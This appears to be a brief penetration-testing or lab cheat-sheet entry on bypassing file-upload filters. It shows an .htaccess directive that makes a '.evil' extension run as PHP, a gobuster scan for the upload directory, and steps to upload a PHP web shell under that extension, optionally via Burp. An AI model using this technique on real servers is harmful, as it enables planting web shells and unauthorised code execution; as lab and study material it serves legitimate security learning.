.htaccess to allow extension
Add Type application/x-httpd-php .evil
# Check the extension type
cat .htaccess
AddType application/x-httpd-php .evil

Check the upload location.
gobuster dir -u http://192.168.120.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Upload the .htaccess.
Hit Ctr + h key to show dot extension for file upload.

Then you can upload the file.
Or, use a BURP to change the name and add the content to the request.

Upload shell.evil (php file, etc.)
Rename the file to whatever you have defined in .htaccess and upload the file.
Last updated